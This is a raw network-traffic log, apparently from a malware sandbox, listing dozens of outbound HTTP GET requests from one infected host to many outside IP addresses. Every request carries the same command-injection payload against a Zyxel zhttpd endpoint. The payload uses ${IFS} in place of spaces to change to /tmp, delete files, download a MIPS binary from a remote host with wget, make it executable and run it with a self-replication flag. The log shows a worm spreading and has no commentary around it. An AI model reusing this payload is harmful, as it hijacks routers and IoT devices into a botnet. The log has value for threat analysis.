                                                      Feb 2, 2024 06:36:11.024744034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8762192.168.2.143359687.107.45.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024791956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8763192.168.2.1438120132.242.206.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024830103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8764192.168.2.145352694.220.87.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024861097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8765192.168.2.143297295.59.138.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024900913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8766192.168.2.1442864114.3.176.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024944067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8767192.168.2.143726288.208.65.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024997950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8768192.168.2.1443906175.24.120.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025032997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8769192.168.2.1438702107.175.179.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025079966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8770192.168.2.1437992166.17.69.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025125980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8771192.168.2.1448144118.145.71.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025163889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8772192.168.2.1438944144.202.13.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025194883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8773192.168.2.145939067.95.204.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025232077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8774192.168.2.145249883.152.32.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025271893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8775192.168.2.1460228184.73.105.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025300980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8776192.168.2.1452086123.93.158.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025327921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8777192.168.2.145726835.168.53.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025383949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8778192.168.2.1460248105.212.33.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025423050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8779192.168.2.1451018148.210.166.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025466919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8780192.168.2.1434452151.177.214.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025528908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8781192.168.2.1442560170.73.22.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025561094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8782192.168.2.143997286.76.17.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025592089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8783192.168.2.1459524193.78.213.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025641918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8784192.168.2.1454518208.252.197.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025672913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8785192.168.2.1441170211.136.205.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025713921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8786192.168.2.144322086.218.207.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025757074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8787192.168.2.1457472196.73.110.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025810003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8788192.168.2.144606269.144.251.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025859118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8789192.168.2.143836268.211.130.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025877953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8790192.168.2.14509841.60.22.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025913000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8791192.168.2.1449788184.123.6.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.025954962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8792192.168.2.146093444.109.111.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026005030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8793192.168.2.144043666.23.161.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026051044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8794192.168.2.1456692122.7.11.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026089907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8795192.168.2.1440680134.97.127.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026144028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8796192.168.2.144510824.199.214.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026192904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8797192.168.2.145464670.206.240.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026233912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8798192.168.2.14531241.118.132.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026276112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8799192.168.2.144282688.207.48.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026319027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8800192.168.2.143323025.107.195.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026366949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8801192.168.2.1439774103.239.182.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026415110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8802192.168.2.145923258.200.188.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026453972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8803192.168.2.145998031.242.197.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026503086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8804192.168.2.1436114161.1.160.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026530981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8805192.168.2.1444388188.118.37.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026573896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8806192.168.2.1438822210.215.16.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026597977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8807192.168.2.1439338117.36.231.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026635885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8808192.168.2.1435304147.13.76.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026658058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8809192.168.2.1442400161.196.51.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026694059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8810192.168.2.14603101.32.236.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026738882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8811192.168.2.143915491.129.61.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026772976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8812192.168.2.145130463.90.15.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026815891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8813192.168.2.1446336213.4.178.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026863098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8814192.168.2.146034625.228.59.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026906013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8815192.168.2.1435234173.120.91.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026926994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8816192.168.2.145999061.144.112.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.026973963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8817192.168.2.145601653.48.171.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027000904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8818192.168.2.145513879.186.10.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027029991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8819192.168.2.1444786178.177.233.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027076006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8820192.168.2.1444364202.58.236.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027123928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8821192.168.2.1456948165.87.69.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027163029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8822192.168.2.1458766177.36.246.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027204037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8823192.168.2.1439614142.174.138.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.027241945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8824192.168.2.1432816193.204.120.224443
                                                      TimestampBytes transferredDirectionData
